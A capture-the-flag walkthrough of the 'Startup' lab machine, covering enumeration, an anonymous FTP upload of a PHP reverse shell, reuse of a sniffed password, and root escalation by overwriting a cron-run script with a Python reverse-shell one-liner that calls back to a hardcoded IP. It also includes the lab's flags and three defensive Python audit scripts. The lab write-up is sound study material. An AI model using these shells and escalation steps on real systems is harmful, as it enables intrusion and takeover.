Startup is a simple machine that teaches you the relationship between FTP and HTTP, and how to escalate privileges through a script that is run by a higher-privileged script.
Let’s start the Startup machine by accessing it from here.
As always, let’s start by scanning the machine with nmap to see which ports are open:
nmap -sV -sC machine_IP
You should get the following results, so we have the following services:
- port 21 for FTP, with anonymous login allowed
- port 22 for SSH
- port 80 for the Apache web server
Let’s open the website on the machine and check whether there is any information that might be useful.
Sadly, there is nothing much on the website other than a coming soon page, and there is no important information in the page’s source code either.
Let’s run gobuster to see which directories and pages are available on the server:
gobuster dir --url http://Machine_IP --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
After some time, we can see our results: there are only two directories, “files” and “server-status”.
Let’s access the “files” directory first.
It contains a couple of files: important.jpg is a normal image and notice.txt is a text file, but let’s leave them for now.
If you try to access the “server-status” directory, you will get a 403 response, as we are not authorized to access that page.
Let’s change direction a bit and try the FTP service. Let’s log in to the FTP server as anonymous, since our nmap results already showed that this is allowed.
We can see the same files we found earlier, so let’s get the image and the notice file first.
notice.txt has the following text:
Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus.
Let’s conclude that there might be a user called “maya” on the system.
Now let’s get important.jpg from the server.
It looks like a normal image, but let’s check the EXIF data of the image (EXIF data is metadata embedded in the image file):
exiftool important.jpg
Since we have FTP access, let’s see whether we can upload anything; let’s check the permissions on the directories we can access.
So we have write permission on the “ftp” directory.
Since the files on the FTP server are exposed to the internet and we can reach them via the browser, and we already know the web server is Apache, let’s upload a reverse shell that connects back to us.
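The root cause of this step is an FTP directory that is both anonymously writable and served by Apache. As an added defensive check (not code from this writeup, and the room does not say which FTP daemon it runs, so treating the server as vsftpd and using its option names is an assumption), the following Python script parses a vsftpd-style configuration, flags the settings that allow anonymous writes, and reports when the anonymous root sits inside the web document root:

```python
import os

# Assumption: the FTP daemon is vsftpd; the room does not say which server it runs.
# These are real vsftpd option names; YES/NO are their documented values.
RISKY_WHEN_YES = {
    "anonymous_enable": "anonymous logins are allowed",
    "write_enable": "FTP write commands are allowed",
    "anon_upload_enable": "anonymous users may upload files",
    "anon_mkdir_write_enable": "anonymous users may create directories",
    "anon_other_write_enable": "anonymous users may delete or rename files",
}


def parse_vsftpd(conf_text):
    """Return {option: value} from a vsftpd.conf-style text, ignoring comments."""
    settings = {}
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip()] = value.strip()
    return settings


def under_web_root(path, doc_root):
    """True when `path` is doc_root itself or lies beneath it."""
    path, doc_root = os.path.abspath(path), os.path.abspath(doc_root)
    return os.path.commonpath([path, doc_root]) == doc_root


def audit_vsftpd(conf_text, doc_root=None):
    """List the settings that let anonymous users write, and whether those
    writes land where Apache would serve (and execute) them."""
    settings = parse_vsftpd(conf_text)

    def is_yes(key):
        return settings.get(key, "").upper() == "YES"

    findings = [f"{key}=YES: {why}" for key, why in RISKY_WHEN_YES.items() if is_yes(key)]
    anon_can_upload = is_yes("anonymous_enable") and is_yes("write_enable") and is_yes("anon_upload_enable")
    anon_root = settings.get("anon_root")
    if anon_can_upload and doc_root and anon_root and under_web_root(anon_root, doc_root):
        findings.append(f"anon_root={anon_root} is inside the web root {doc_root}: "
                        "an uploaded .php file would be executed by Apache")
    return findings


# Constructed sample configurations, not the Startup machine's real files.
WEAK_CONF = """\
listen=YES
anonymous_enable=YES
local_enable=YES
write_enable=YES
anon_upload_enable=YES
anon_root=/var/www/html/files
"""

HARDENED_CONF = """\
listen=YES
anonymous_enable=YES
local_enable=YES
write_enable=NO
anon_upload_enable=NO
anon_root=/srv/ftp
"""

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label)
        for finding in audit_vsftpd(conf, doc_root="/var/www/html"):
            print("  -", finding)
```

Read-only anonymous access still produces one informational finding; the dangerous combination is anonymous_enable, write_enable and anon_upload_enable all set to YES while anon_root lies under the Apache DocumentRoot, which is exactly the situation this room exposes.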
As always, let’s get our PHP reverse shell from pentest monkey (don’t forget to change the IP and port to your own machine’s).
Then we upload the file to the “ftp” directory using the “put” command:
put php-reverse-shell.php
Now let’s open a listening port on our machine with netcat:
nc -lvnp 1234
Then open the uploaded file in the browser and you should get the shell.
Let’s look at the home directory: there is a user called “lennie”, but sadly we don’t have permission to access his directory.
Let’s see which users exist on the system:
cat /etc/passwd
So we have root, lennie and ftpsecure. Apparently there is no user called “Maya”, so we can ignore that name for now.
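Reading /etc/passwd by eye works for three accounts; on a larger system you want the same triage done by a script. The following Python parser is an added example (not from this writeup), run against a constructed passwd excerpt rather than the Startup machine’s real file; it lists the accounts that can actually log in interactively and flags any account other than root that carries uid 0:

```python
# Shells that mark an account as non-interactive (service accounts).
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; malformed lines are skipped."""
    accounts = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # passwd entries always have exactly seven fields
        name, _pw, uid, gid, _gecos, home, shell = fields
        accounts.append({"name": name, "uid": int(uid), "gid": int(gid),
                         "home": home, "shell": shell})
    return accounts


def interactive_accounts(accounts):
    """Names of accounts whose login shell is a real shell."""
    return [a["name"] for a in accounts if a["shell"] not in NOLOGIN_SHELLS]


def extra_uid0(accounts):
    """Accounts other than root with uid 0: a classic persistence trick to look for."""
    return [a["name"] for a in accounts if a["uid"] == 0 and a["name"] != "root"]


# Constructed sample, not the real /etc/passwd from the machine.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
lennie:x:1002:1002::/home/lennie:/bin/bash
ftpsecure:x:1001:133::/home/ftpsecure:/usr/sbin/nologin
"""

# Same sample with a constructed second uid-0 account appended, to show the check firing.
TAMPERED_PASSWD = SAMPLE_PASSWD + "svc:x:0:0::/:/bin/sh\n"

if __name__ == "__main__":
    accounts = parse_passwd(SAMPLE_PASSWD)
    print("interactive:", interactive_accounts(accounts))
    print("extra uid 0:", extra_uid0(parse_passwd(TAMPERED_PASSWD)))
```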
Let’s see whether we have access to any other directories on the system; luckily we have access to “recipe.txt” and “incidents”.
Let’s output the contents of recipe.txt:
cat recipe.txt
And we get our first answer for the Startup machine:
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.
What is the secret spicy soup recipe?
love
Let’s go into the “incidents” directory, where we find a pcap file, which contains a dump of packets captured on the network.
Let’s get the file from the server so we can analyze it.
To get the file, we can simply copy it from the current directory to the “files/ftp” directory, which we can reach through FTP and through the browser; since our user is www-data, it has access to the directories inside the web root anyway.
cp suspicious.pcapng /var/www/html/files/ftp/
Now we can access the file via the browser and download it.
After downloading it, let’s open it with Wireshark.
Let’s follow the TCP streams until we find something interesting (you can change the stream by increasing the value highlighted below, which is number 7 in the image).
Going through the commands, we can see someone trying to hack the machine: they listed the files, then spawned a one-line Python shell.
Then we can see they tried to go inside the “lennie” directory but got the same error we did; then they tried a password for the www-data user to get sudo, but it was the wrong password.
Finally, they listed the users in /etc/passwd and exited the shell.
Now the journey is a bit weird, especially as they used the same password three times, as if they were trying to log in to their own account, NOT brute-forcing the password.
With that in mind, let’s try to log in as lennie, but first we need a proper shell; of course we can use the one-liner the hacker already used:
python -c "import pty;pty.spawn('/bin/bash')"
Now, let’s switch user with
su lennie
and the password we saw above:
c4ntg3t3n0ughsp1c3
And voilà! We have access to lennie,
and now we can access lennie’s directory in home.
We have two directories and our second flag; let’s output user.txt first.
What are the contents of user.txt?
THM{03ce3d619b80ccbfb3b7fc81e46c0e79}
Great, now let’s check the “Documents” folder first,
which has three files with the following content:
concern.txt
I got banned from your library for moving the "C programming language" book into the horror section. Is there a way I can appeal? --Lennie
list.txt
Shoppinglist: Cyberpunk 2077 | Milk | Dog food
note.txt
Reminders: Talk to Inclinant about our lacking security, hire a web developer, delete incident logs.
Nothing much here; let’s check the second directory.
Let’s check the script planner.sh.
The code echoes a list to the startup_list.txt file, then executes the /etc/print.sh script.
Let’s check that script and what permissions we have on it: we have write permission on the file, which is perfect.
Great! We have write permission on that file since we are also its owner, and since the file is executed by “planner.sh”, which runs with root permission, we should be able to escalate our privileges with a one-line bash shell.
Let’s try to include our own code to run bash (written with printf so the shebang and the bash command end up on separate lines):
printf '#!/bin/bash\nbash\n' > /etc/print.sh
Now, if we run planner.sh again, we should get an interactive shell.
BUT, sadly we don’t, since we are running the file as lennie and it won’t give us anything more. Let’s see whether there is a cron job that runs the file for us, since we are not allowed to run it as root ourselves:
cat /etc/crontab
But there’s nothing; let’s check whether we have a cron process running:
pstree -apl `pidof cron`
Great, we have a process with id 1027; let’s check what that process runs:
ps -aef --forest -p 1027
But I couldn’t find anything there either. I was in doubt whether it is run by a cron job at all, until I found a script online that helped:
find . -name "planner.sh" -exec '{}' \; -print 2>/dev/null
What this does is run the script and show the value it returns; all we have to do now is search for “Done”, and that confirmed our suspicion.
So now, let’s edit print.sh to give us a reverse shell over a new netcat connection:
cat > /etc/print.sh << EOF
#!/bin/bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.6.59.163",2345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
EOF
And voilà! We get the root shell,
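The whole escalation above rests on one misconfiguration: a script that root runs from cron invokes a second script that an unprivileged user owns and can edit. As an added example (not code from this writeup), the following Python audit walks from an entry script through every script it invokes by absolute path and reports any link in that chain that is not owned by root or is group- or world-writable. The demo() scenario is constructed in a temporary directory to mirror planner.sh calling /etc/print.sh; the path-extraction regex is an assumption and only catches helpers invoked by absolute path, as planner.sh does.

```python
import os
import re
import stat
import tempfile

# Assumption: helper scripts are invoked by absolute path (as planner.sh invokes
# /etc/print.sh), so an absolute path ending in .sh is treated as a reference.
SCRIPT_REF = re.compile(r"(?<![\w/])(/[\w./-]+\.sh)\b")


def script_findings(path, expected_owner_uid=0):
    """Reasons why `path` is unsafe to be executed by a privileged job."""
    findings = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return [f"{path}: missing"]
    if st.st_uid != expected_owner_uid:
        findings.append(f"{path}: owned by uid {st.st_uid}, not uid {expected_owner_uid}")
    if st.st_mode & stat.S_IWGRP:
        findings.append(f"{path}: group-writable")
    if st.st_mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable")
    return findings


def audit_chain(entry_script, expected_owner_uid=0, _seen=None):
    """Audit entry_script and, recursively, every script it references."""
    _seen = _seen if _seen is not None else set()
    if entry_script in _seen:
        return []  # guard against scripts that call each other in a loop
    _seen.add(entry_script)
    findings = script_findings(entry_script, expected_owner_uid)
    try:
        with open(entry_script) as fh:
            body = fh.read()
    except OSError:
        return findings
    for ref in SCRIPT_REF.findall(body):
        findings.extend(audit_chain(ref, expected_owner_uid, _seen))
    return findings


def demo():
    """Constructed scenario: a locked-down planner.sh that calls a print.sh
    anyone can edit, built in a temporary directory rather than /etc."""
    root = tempfile.mkdtemp()
    print_sh = os.path.join(root, "print.sh")
    planner = os.path.join(root, "planner.sh")
    with open(print_sh, "w") as fh:
        fh.write("#!/bin/bash\necho Done!\n")
    with open(planner, "w") as fh:
        fh.write(f"#!/bin/bash\necho 'list' > {root}/startup_list.txt\n{print_sh}\n")
    os.chmod(print_sh, 0o666)  # the misconfiguration: writable by every user
    os.chmod(planner, 0o700)   # the entry script itself is not writable by others
    return audit_chain(planner, expected_owner_uid=0)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run as root against real cron entries, the only findings should be empty lists; any "writable" or "owned by uid" line is a file that a privileged job trusts but does not control, which is the fix the note.txt reminder about lacking security was pointing at.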
and now we can answer the last part:
What are the contents of root.txt?
THM{f963aaa6a430f210222158ae15c3d76d}
And that’s all for the Startup machine.